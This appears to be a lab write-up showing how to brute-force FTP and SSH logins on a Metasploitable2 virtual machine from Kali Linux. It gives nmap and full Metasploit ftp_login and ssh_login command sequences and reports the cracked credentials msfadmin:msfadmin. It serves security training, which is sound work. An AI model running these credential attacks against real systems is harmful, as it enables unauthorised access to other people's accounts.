🧪 LAB OVERVIEW
This lab demonstrates how to
perform brute force attacks on FTP and SSH services using Metasploit
Framework (msfconsole). The target machine is Metasploitable2, and
the attacker machine is Kali Linux.
🖥️ Machines Used
Role Operating System Tools Used
Attacker Kali Linux Metasploit (msfconsole) Target Metasploitable 2FTP
(vsftpd), SSH (OpenSSH)
🌐 1. Network Setup
✅ Environment: VirtualBox
or VMware
- Set both machines to Host-Only Adapter or NAT
Network.
- Ensure both machines are on the same subnet.
- Confirm connectivity using ping.
🖥️ On Kali Linux:
ping 192.168.142.130
🖥️ On Metasploitable2:
ping 192.168.142.128
🔍 2. Scan the Target
Machine (Metasploitable2)
Use Nmap to discover open
services
nmap -sS -sV 192.168.142.130
You should see:
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
Debian
🚪 3. Brute Force FTP
(Port 21)
🛠️ Step-by-Step:
📁 Prepare user and
password files:
nano /home/kali/custom_users.txt
# Example content:
msfadmin
nano /home/kali/custom_pass.txt
🚀
Launch Metasploit:
msfconsole
use
auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.142.130
set USER_FILE
/home/kali/custom_users.txt
set PASS_FILE
/home/kali/custom_pass.txt
set THREADS 10
run
output: msfadmin:msfadmin
🔐 4. Brute Force SSH
(Port 22)
🛠️ Step-by-Step:
🚀 Launch Metasploit:
msfconsole
use
auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.142.130
set USER_FILE
/home/kali/custom_users.txt
set PASS_FILE
/home/kali/custom_pass.txt
set THREADS 10
set VERBOSE true
set STOP_ON_SUCCESS true
run
🧾 Conclusion
In this lab, we successfully
simulated brute force attacks on FTP and SSH services of a
vulnerable target (Metasploitable2) using Metasploit Framework. The
results revealed weak credentials (msfadmin:msfadmin) that allowed
unauthorized access.
0 Comments